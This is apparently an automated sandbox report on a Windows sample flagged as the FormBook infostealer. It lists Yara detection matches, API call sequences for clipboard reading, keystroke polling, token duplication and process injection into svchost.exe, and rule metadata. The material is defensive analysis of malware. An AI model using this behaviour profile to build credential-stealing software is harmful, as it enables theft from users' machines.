            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00856D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00856D07
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00856B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00856B0C
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00842B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00842B37
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0086F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0086F7FF

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: This is a third-party compiled AutoIt script.0_2_00803D19
            Source: s7Okni1gfE.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: s7Okni1gfE.exe, 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_772e0d31-6
            Source: s7Okni1gfE.exe, 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4d20a6fb-2
            Source: s7Okni1gfE.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e567c987-5
            Source: s7Okni1gfE.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1e51bef4-0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C0F3 NtClose,2_2_0042C0F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00846685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00846685
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0083ACC5
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008479D3
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082B0430_2_0082B043
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008132000_2_00813200
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083410F0_2_0083410F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008202A40_2_008202A4
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083038E0_2_0083038E
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0080E3B00_2_0080E3B0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008206D90_2_008206D9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083467F0_2_0083467F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0086AACE0_2_0086AACE
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00834BEF0_2_00834BEF
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082CCC10_2_0082CCC1
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00806F070_2_00806F07
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0080AF500_2_0080AF50
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008631BC0_2_008631BC
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082D1B90_2_0082D1B9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081B11F0_2_0081B11F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082123A0_2_0082123A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083724D0_2_0083724D
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008413CA0_2_008413CA
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008093F00_2_008093F0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081F5630_2_0081F563
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008096C00_2_008096C0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084B6CC0_2_0084B6CC
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008077B00_2_008077B0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0086F7FF0_2_0086F7FF
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008379C90_2_008379C9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081FA570_2_0081FA57
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00809B600_2_00809B60
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00813B700_2_00813B70
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00807D190_2_00807D19
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00829ED00_2_00829ED0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081FE6F0_2_0081FE6F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00807FA30_2_00807FA3
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_011B41200_2_011B4120
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181432_2_00418143
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030402_2_00403040
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010F02_2_004010F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021DD2_2_004021DD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021E02_2_004021E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9AA2_2_0040F9AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9B32_2_0040F9B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012602_2_00401260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163232_2_00416323
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBD32_2_0040FBD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DBF42_2_0040DBF4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040238C2_2_0040238C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023902_2_00402390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC532_2_0040DC53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026C02_2_004026C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E7232_2_0042E723
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030856302_2_03085630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031095C32_2_031095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD22_2_03003FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD52_2_03003FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D3DD5A6_2_02D3DD5A
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D482A36_2_02D482A3
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D3FB106_2_02D3FB10
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D3FB196_2_02D3FB19
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D5E8896_2_02D5E889
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D464896_2_02D46489
            Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exeCode function: 6_2_02D3FD396_2_02D3FD39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 111 times
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: String function: 0081EC2F appears 68 times
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: String function: 00826AC0 appears 42 times
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: String function: 0082F8A0 appears 35 times
            Source: s7Okni1gfE.exe, 00000000.00000003.1476525427.0000000003A7D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs s7Okni1gfE.exe
            Source: s7Okni1gfE.exe, 00000000.00000003.1477404707.00000000038D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs s7Okni1gfE.exe
            Source: s7Okni1gfE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
